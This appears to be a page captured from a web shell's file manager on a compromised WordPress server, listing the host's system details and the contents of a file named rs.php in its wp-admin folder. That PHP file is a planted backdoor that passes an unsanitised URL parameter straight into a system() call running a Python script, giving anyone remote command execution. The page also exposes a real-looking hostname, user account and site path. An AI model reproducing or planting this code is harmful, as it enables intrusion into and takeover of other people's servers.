HEX
Server: LiteSpeed
System: Linux server.innovtouch.com 5.15.0-152-generic #162-Ubuntu SMP Wed Jul 23 09:48:42 UTC 2025 x86_64
User: skresins (10152)
PHP: 8.2.29
Disabled: opcache_get_status
Upload Files
File: /var/www/vhosts/skresins.com/public_html/wp-admin/rs.php
<?php
@header('Access-Control-Allow-Origin: *');
if($_GET) {
  $send_cmd = system('python rs.py "' . $_GET["e"] . '" 2>&1');
  echo($send_cmd);
}
?>